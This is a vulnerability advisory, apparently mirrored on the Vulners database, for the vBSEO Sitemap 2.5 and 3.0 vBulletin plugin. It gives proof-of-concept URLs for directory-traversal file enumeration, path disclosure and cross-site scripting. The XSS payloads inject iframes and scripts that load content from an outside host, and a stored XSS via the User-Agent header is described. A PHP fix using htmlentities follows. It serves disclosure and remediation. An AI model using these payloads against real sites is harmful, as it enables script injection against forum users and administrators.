Vulners
Lucene search
vBSEO Sitemap 2.5 & 3.0 - Multiple Vulnerabilities
vBSEO Sitemap - Multiple Vulnerabilities
Versions Affected: 2.5 and 3.0 (Most likely all versions)
Info:
A proven success record, vBSEO powers the most optimized forums on the Web.
The #1 SEO plugin and the only professional, fully supported solution. A full
package of SEO enhancements, one install, one upgrade.
External Links:
http://www.vbseo.com
Credits: MaXe (@InterN0T)
-:: The Advisory ::-
vBSEO is prone to multiple vulnerabilities, such as path disclosure, enumeration of files, persistent and non-persistent XSS. Please see the details below.
vBSEO Sitemap 3.0 Gold:
Enumeration and confirmation of files:
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?rlist=true&details=../../../vb4_readme.txt
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=../../../../vb4_readme.txt
Proof of Concept XSS: (Non-Persistent)
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E
http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E
Path Disclosure: (any file in the addon directory - includes fatal errors)
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_medialibrary.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links3.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vbagallery.php
----------------------- END OF vBSEO 3.0 -----------------------
vBSEO Sitemap 2.5: (initial first release)
Enumeration and confirmation of files:
http://www.target.tld/vbseo_sitemap/index.php?details=../../robots.txt
http://www.target.tld/vbseo_sitemap/index.php?hitdetails=../../../robots.txt
Non-Persistent XSS: (PoC)
http://www.target.tld/vbseo_sitemap/index.php?dlist=true&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E
[May require bot hits to work!] http://www.target.tld/vbseo_sitemap/index.php?removedl[0]=&botsonly=%22%3E%3Cscript%3Edocument.documentElement.innerHTML=%22%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=5312%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E%22;%3C/script%3E
http://www.target.tld/vbseo_sitemap/index.php?hitdetails=PADPAD%20%3Ciframe%20frameborder=%270%27%20border=0%20width=%27425%27%20height=%27344%27%20src=%27http://pown.it/obj.php?ID=3663%27%20name=iframe%20scrolling=no%20style=%27position:absolute;%27%20allowtransparency=%27true%27%3E%3C/iframe%3E
Path Disclosure: (any file in the addon directory - includes fatal errors)
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_calendar.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_downloads2.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba.php
http://www.target.tld/vbulletin/upload/vbseo_sitemap/addons/vbseo_sm_vba_links.php
http://www.target.tld/includes/functions_vbseo_url.php
----------------------- END OF vBSEO 2.5 -----------------------
vBSEO Sitemap: (Most likely all versions)
Persistent XSS:
1) The user-agent is not sanitized in a sufficient way allowing an attacker to inject persistent scripts.
2) Then the attacker must request the sitemap via one of the following links:
- http://www.target.tld/vbulletin/upload/vbseo_sitemap/index.php?dlist=true
- http://www.target.tld/vbulletin/upload/vbseo_sitemap/vbseo_getsitemap.php?sitemap=sitemap_index.xml.gz
3) Then an authenticated administrator must view one of the pages containing the injected and potentially malicious user-agent:
http://www.target.tld/vbseo_sitemap/index.php?dlist=true&page=357
[!] All vulnerabilities requires authentication and they do not survive a login screen, making them almost harmless.
-:: Solution ::-
Before: (file: index.php within vbseo_sitemap) -- Version 2.5
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
<td><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
<td align="right"><?php echo $sdate?></td>
<td><?php echo $dl['sitemap']?></td>
<td><b><?php echo $dl['ua']?></b></td>
<td><?php echo $dl['ip']?></td>
<td><?php echo $dl['useragent']?></td>
<td>
<a href="index.php?removedl[<?php echo $dn?>]=<?php echo $dl['time']?>&botsonly=<?php echo $_GET['botsonly']?>" onclick="return confirm('Are you sure?')">Rem$
</td>
<td>
<input type="checkbox" name="removedl[<?php echo $dn?>]" value="<?php echo $dl['time']?>">
</td>
</tr>
After:_______________________________________________________
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
<td><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
<td align="right"><?php echo $sdate?></td>
<td><?php echo $dl['sitemap']?></td>
<td><b><?php echo $dl['ua']?></b></td>
<td><?php echo $dl['ip']?></td>
<td><?php echo htmlentities($dl['useragent'])?></td>
<td>
<a href="index.php?removedl[<?php echo $dn?>]=<?php echo $dl['time']?>&botsonly=<?php echo $_GET['botsonly']?>" onclick="return confirm('Are you sure?')">Rem$
</td>
<td>
<input type="checkbox" name="removedl[<?php echo $dn?>]" value="<?php echo $dl['time']?>">
</td>
</tr>
---------------------------------------------------------------------------------------------
Before: (file: index.php within vbseo_sitemap) -- Version 3.0
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>" align="right"><?php echo $sdate?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['sitemap']?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><b><?php echo $dl['ua']?></b></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['ip']?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo htmlentities($dl['useragent'])?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>">
After:_______________________________________________________
<tr class="<?php echo $dd%2?'altfirst':'altsecond'?>">
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dn+($cpage-1)*VBSEO_SM_PAGESIZE?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>" align="right"><?php echo $sdate?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['sitemap']?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><b><?php echo $dl['ua']?></b></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo $dl['ip']?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>"><?php echo htmlentities($dl['useragent'])?></td>
<td class="<?php echo $dd%2?'alt1':'alt2'?>">
---------------------------------------------------------------------------------------------
In addition, vbseo_getsitemap.php which grabs the unsanitized user-agent can also be fixed by finding this line:
'useragent'=>$_SERVER['HTTP_USER_AGENT'],
And changing it to this:
'useragent'=>htmlentities($_SERVER['HTTP_USER_AGENT']),
Disclosure Information:
- Vulnerability found and researched: ~27th December 2010
- Semi-Disclosed at InterN0T: 30th December
- Detailed Disclosure: 31st January 2011
References:
http://forum.intern0t.net/intern0t-advisories/3632-vbseo-sitemap-2-5-3-0-multiple-minor-vulnerabilities.html
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1